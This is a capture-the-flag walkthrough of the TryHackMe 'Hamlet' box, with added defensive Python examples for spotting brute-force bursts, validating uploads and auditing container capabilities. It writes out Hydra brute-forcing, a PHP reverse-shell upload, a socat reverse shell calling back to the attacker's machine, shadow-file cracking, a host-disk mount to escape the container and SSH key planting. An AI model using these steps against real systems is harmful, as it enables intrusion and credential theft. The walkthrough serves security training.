Hamlet – Walkthrough En | TryHackMe – Write-up

Hamlet is a CTF box from TryHackMe that requires fairly deep enumeration, then putting the pieces together with CeWL and Hydra to bypass authentication. In the end, it is necessary to escape from the container.

 

Enumeration

Command :

nmap -T5 -sV -p- 10.10.78.81

WEB enumeration

On the three web services, the directories have to be enumerated to see what might be interesting. This was done with Dirsearch.

Command :

dirsearch -u 10.10.78.81 -x 403

dirsearch -u 10.10.78.81:8000 -x 403

 

dirsearch -u 10.10.78.81:8080 -x 400,401,403,404,500

 

Nothing conclusive appears.

On the port 80 website, we can retrieve a hamlet.txt file, as well as information about Michael 'ghost', who seems to be obsessed with a man named Hamlet.

 

On port 8000, there is almost the same thing. The text about Hamlet seems to be the same as on port 80; it is in fact an iframe whose source is at this address: /repository/project/0/document/0/source/hamlet.txt

On port 8080, the site presents a login form requiring credentials that we do not have.

 

FTP enumeration:

Access to the FTP server is done with the anonymous account but, for obscure reasons, I could only access it from Firefox.

We retrieve the firewall rules from the ufw.status file and the password policy from the password-policy.md file.

At this stage, the password-policy.md file is very interesting because it gives us the length and complexity of the password.

  • a length of 12 to 14 characters
  • all in lowercase
 

Bruteforce login - Cewl - Wordlist

Using cewl and the hamlet.txt file, we will create a password list.

Command :

cewl -m 12 --lowercase -w password_list.txt http://10.10.78.81/hamlet.txt

 

Bruteforce Login - Hydra

With this list of words of at least 12 characters, in lower case, we are going to bruteforce the login page with Hydra

Command :

hydra -V -l ghost -P test.txt 10.10.78.81 -s 8080 http-post-form -m "/login.html?-1.-loginForm:urlfragment=&username=^USER^&password=^PASS^&Login=Login:Login failed"
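From the defender's side, the Hydra run above leaves a very recognisable trace: a burst of POSTs to the login form from a single client. The following is an added example, not code from the original write-up, that parses combined-format access log lines and flags clients whose login POST rate inside a sliding window exceeds a threshold. The log lines are constructed here (the burst uses the attacking host's address as it appears in this write-up); the window and threshold values are assumptions to tune per site.

```python
"""Spot a login brute-force burst in web server access logs.

Added example for this write-up, not code from the original post. The log
lines are constructed, not captured from the Hamlet box.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined-log-format line: client, timestamp, request line, status, bytes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return the fields we need from one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FMT),
        "method": m["method"],
        "path": m["path"].split("?", 1)[0],   # drop the Wicket query string
        "status": int(m["status"]),
    }


def login_bursts(lines, login_path="/login.html", window_seconds=60, threshold=10):
    """Return {client_ip: max POSTs to login_path inside any window} for
    clients that reach `threshold`. The HTTP status is deliberately ignored:
    the Hydra run above keys on the body text 'Login failed', which shows the
    application reports failure in the page rather than via a status code, so
    request rate is the reliable signal."""
    window = timedelta(seconds=window_seconds)
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] == login_path:
            per_ip[rec["ip"]].append(rec["ts"])
    alerts = {}
    for ip, stamps in per_ip.items():
        stamps.sort()
        start, best = 0, 0
        for end, ts in enumerate(stamps):          # sliding window over sorted timestamps
            while ts - stamps[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            alerts[ip] = best
    return alerts


def _line(ip, second, method="POST", path="/login.html?-1.-loginForm", status=200):
    """Build one constructed log line (sample data, not a real capture)."""
    return (f'{ip} - - [10/Oct/2023:12:00:{second:02d} +0000] '
            f'"{method} {path} HTTP/1.1" {status} 4120')


# Constructed sample: 12 login POSTs in 12 seconds from one client (the Hydra
# pattern), two slow attempts from another client, and one plain page load.
SAMPLE_LOG = [_line("10.11.38.124", s) for s in range(12)]
SAMPLE_LOG += [_line("192.0.2.10", 5), _line("192.0.2.10", 40),
               _line("192.0.2.10", 7, method="GET", path="/login.html")]

if __name__ == "__main__":
    for ip, n in login_bursts(SAMPLE_LOG).items():
        print(f"ALERT {ip}: {n} login POSTs within 60s")
```

Counting requests rather than failures is the design choice worth noting: an application that returns 200 for both outcomes cannot be monitored on status codes alone, and a password-policy file that pins length and character class (as on this box) makes small targeted lists plausible, so even a short burst is worth an alert.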

Initial foothold - WebAnno Login

Once connected, you must create a new project. Then you have to add a document to it. Instead of a text file, we will put a reverse shell in PHP. It does not check the contents or the extension of the file.

 

In the Documents tab, you can click on Browse to insert the reverse shell. The shell used is pentestmonkey's, available for direct download at this address: https://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
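The weakness exploited here is that the upload checks neither the extension nor the contents. As an added example (not WebAnno's code, and not from the original post), the following shows what a hardened document upload looks like: an extension allow-list, a size cap, a text-only content check that catches server-side code markers even behind a double extension, and a random server-side file name so the stored path is never derived from the client's. The accepted extensions and marker list are assumptions for a plain-text annotation source.

```python
"""Server-side validation for a document upload.

Added example for this write-up, not WebAnno's code. The accepted-extension
policy, size limit and marker list are assumptions.
"""
import os
import re
import secrets

ALLOWED_EXTENSIONS = {".txt", ".tsv"}        # assumed policy for document sources
MAX_BYTES = 5 * 1024 * 1024                   # assumed limit
# Byte sequences that mark server-side or client-side code; none belongs in a text document.
EXECUTABLE_MARKERS = (b"<?php", b"<?=", b"<%", b"<script")
CONTROL_CHARS = re.compile(r"[\x00-\x08\x0b\x0c\x0e-\x1f]")


def split_name(filename):
    """Drop any directory part the client sent and return (stem, lowercase ext)."""
    base = os.path.basename(filename.replace("\\", "/"))
    stem, ext = os.path.splitext(base)
    return stem, ext.lower()


def validate_upload(filename, data):
    """Return (accepted, reason). Both the name and the bytes are checked, so
    'shell.php.txt' with PHP inside is rejected even though the final
    extension is on the allow-list."""
    stem, ext = split_name(filename)
    if not stem or ext not in ALLOWED_EXTENSIONS:
        return False, f"extension {ext!r} not allowed"
    if len(data) > MAX_BYTES:
        return False, "file too large"
    if b"\x00" in data:
        return False, "binary content (NUL byte)"
    try:
        text = data.decode("utf-8")
    except UnicodeDecodeError:
        return False, "not valid UTF-8 text"
    lowered = data.lower()
    for marker in EXECUTABLE_MARKERS:
        if marker in lowered:
            return False, f"executable marker {marker.decode()} found"
    if CONTROL_CHARS.search(text):
        return False, "control characters in text"
    return True, "ok"


def storage_name(filename):
    """Random server-side file name: the stored path is never attacker-chosen,
    so an uploaded file cannot be located under its original name."""
    _, ext = split_name(filename)
    return secrets.token_hex(16) + ext


# Constructed samples (not files from the box).
HAMLET_SNIPPET = b"To be, or not to be, that is the question.\n"
PHP_STUB = b"<?php echo 'placeholder, not a real shell'; ?>\n"

if __name__ == "__main__":
    for name, data in [("hamlet.txt", HAMLET_SNIPPET),
                       ("shell.php", PHP_STUB),
                       ("shell.php.txt", PHP_STUB),
                       ("../../../tmp/job.txt", HAMLET_SNIPPET)]:
        ok, why = validate_upload(name, data)
        print(f"{name:28} -> {'accept' if ok else 'reject'} ({why})")
```

The content check is the part that matters most on this box: an extension check alone is bypassed by renaming, and a stored file that is later served by a different, script-capable web server (here the port 8000 repository view) is exactly the case where a text-only policy on ingest pays off.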

 

Reverse Shell

It only remains to find where it has been stored. Recall that on port 8000 we had found the location of the hamlet.txt document.

/repository/project/0/document/0/source/hamlet.txt

By replacing the 0 with 1 and hamlet.txt with shell.php, we can find our reverse_shell. The final address : http://10.10.78.81:8000/repository/project/1/document/1/source/shell.php

Before following the link, you must set up a netcat listener.

Command :

nc -nlvp 1234

 

Upgrade shell with socat

Python not being installed, nor socat for that matter, it is quite difficult to enumerate the system. To counter this, I will download a socat binary and use it to upgrade the shell.

Link to download socat https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x86_64/socat

It must then be downloaded onto the victim machine. Since wget is not installed, you have to use curl.

curl -O http://10.11.38.124:8000/socat

With a web server on kali: 

python3.9 -m http.server

Then run these two commands:

chmod +x socat

Listener on kali :

socat file:`tty`,raw,echo=0 tcp-listen:4444

Command on host :

/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.11.38.124:4444

 

Lateral movement - root

We are in a container, but we can crack the account password: the shadow file is readable. After copying the contents of /etc/shadow and /etc/passwd, use unshadow and John the Ripper.

Command :

unshadow passwd shadow > unshadowed.txt

john unshadowed.txt --format=crypt --wordlist=/usr/share/wordlists/rockyou.txt

Privilege escalation

Now that we are in the root account, we can perform any operation inside the container.

Local enumeration

In /dev, several disk devices are visible.

ls -al /dev/ | grep disk

As we can see there are several disks, including xvda1, xvda2 and xvda3.

Only xvda2 can be mounted in a folder; the other two cannot.

Once we have mounted xvda2 in the /mnt/xvda2_fake folder, we can retrieve the root flag. It is also possible to create an SSH key pair and use it to connect to the system.

Mounting xvda2

mkdir /mnt/xvda2_fake

mount /dev/xvda2 /mnt/xvda2_fake/
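The escape works because two conditions hold at once: a host block device is visible inside the container, and the container's root still holds CAP_SYS_ADMIN, which mount(2) requires. The following is an added example, not code from the original write-up or from the box, that a defender can run inside a container to audit both: it decodes the CapEff mask from /proc/self/status into capability names and lists block devices from `ls -l /dev` output. The status text and device listing below are constructed (the two masks are the usual Docker defaults for an unprivileged and a --privileged container on a 38-capability kernel); the "escape" capability set is an assumption of what to flag.

```python
"""Check whether a container is configured so that a host disk can be mounted.

Added example for this write-up, not code from the original post or the box.
The /proc/self/status and `ls -l /dev` text below is constructed.
"""
import re

# Linux capability bit numbers (include/uapi/linux/capability.h).
CAP_NAMES = {
    0: "cap_chown", 1: "cap_dac_override", 2: "cap_dac_read_search",
    3: "cap_fowner", 4: "cap_fsetid", 5: "cap_kill", 6: "cap_setgid",
    7: "cap_setuid", 8: "cap_setpcap", 9: "cap_linux_immutable",
    10: "cap_net_bind_service", 11: "cap_net_broadcast", 12: "cap_net_admin",
    13: "cap_net_raw", 14: "cap_ipc_lock", 15: "cap_ipc_owner",
    16: "cap_sys_module", 17: "cap_sys_rawio", 18: "cap_sys_chroot",
    19: "cap_sys_ptrace", 20: "cap_sys_pacct", 21: "cap_sys_admin",
    22: "cap_sys_boot", 23: "cap_sys_nice", 24: "cap_sys_resource",
    25: "cap_sys_time", 26: "cap_sys_tty_config", 27: "cap_mknod",
    28: "cap_lease", 29: "cap_audit_write", 30: "cap_audit_control",
    31: "cap_setfcap", 32: "cap_mac_override", 33: "cap_mac_admin",
    34: "cap_syslog", 35: "cap_wake_alarm", 36: "cap_block_suspend",
    37: "cap_audit_read", 38: "cap_perfmon", 39: "cap_bpf",
    40: "cap_checkpoint_restore",
}
# Assumed set to flag: capabilities that let root-in-container reach the host
# (mount, raw device I/O, kernel modules, ptrace, creating device nodes).
ESCAPE_CAPS = {"cap_sys_admin", "cap_sys_rawio", "cap_sys_module",
               "cap_sys_ptrace", "cap_mknod"}


def decode_capeff(hex_mask):
    """Turn the CapEff hex mask from /proc/<pid>/status into capability names."""
    bits = int(hex_mask, 16)
    return {CAP_NAMES.get(i, f"cap_{i}") for i in range(bits.bit_length()) if bits >> i & 1}


def capeff_from_status(status_text):
    """Extract the CapEff mask from the text of /proc/self/status."""
    m = re.search(r"^CapEff:\s*([0-9a-fA-F]+)\s*$", status_text, re.MULTILINE)
    if not m:
        raise ValueError("no CapEff line found")
    return m.group(1)


def block_devices(ls_output):
    """Names of block devices (mode starting with 'b') in `ls -l /dev` output."""
    names = []
    for line in ls_output.splitlines():
        fields = line.split()
        if len(fields) >= 2 and fields[0].startswith("b"):
            names.append(fields[-1])
    return names


def audit(status_text, ls_output):
    """Summarise what the container could do with a visible host disk."""
    caps = decode_capeff(capeff_from_status(status_text))
    devs = block_devices(ls_output)
    return {
        "block_devices": devs,
        "escape_caps": sorted(caps & ESCAPE_CAPS),
        # mount(2) needs CAP_SYS_ADMIN; together with a block device in /dev
        # that is what the xvda2 mount above relies on.
        "can_mount_host_disk": "cap_sys_admin" in caps and bool(devs),
    }


# Constructed inputs: typical Docker CapEff for a default and a --privileged
# container (38-capability kernel), and a /dev listing matching the box's disks.
STATUS_DEFAULT = "Name:\tbash\nCapEff:\t00000000a80425fb\n"
STATUS_PRIVILEGED = "Name:\tbash\nCapEff:\t0000003fffffffff\n"
LS_DEV = """\
total 0
crw-rw-rw- 1 root root   1,   3 Oct 10 12:00 null
brw-rw---- 1 root disk 202,   1 Oct 10 12:00 xvda1
brw-rw---- 1 root disk 202,   2 Oct 10 12:00 xvda2
brw-rw---- 1 root disk 202,   3 Oct 10 12:00 xvda3
"""

if __name__ == "__main__":
    # Live use: pass open('/proc/self/status').read() and the output of `ls -l /dev`.
    for label, status in [("default caps", STATUS_DEFAULT), ("privileged", STATUS_PRIVILEGED)]:
        print(label, audit(status, LS_DEV))
```

Read the result as a necessary-condition check: a missing CAP_SYS_ADMIN or an empty device list is a reliable negative, while a positive does not guarantee the mount succeeds, because a seccomp or AppArmor profile can still deny the syscall. The fix on the container side is the usual one: do not run with --privileged, drop capabilities you do not need, and do not pass host block devices into the container.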

Creation of an id_rsa key

ssh-keygen -f id_rsa

Copy id_rsa.pub into authorized_keys:

cat id_rsa.pub >> authorized_keys

ssh connection

chmod 600 id_rsa

ssh root@10.10.78.81 -i id_rsa


That’s all folks

Thank you for taking the trouble to come to the site to read this Write-Up

I hope it was useful to you and that it taught you new things.

Feel free to leave a comment or share this article
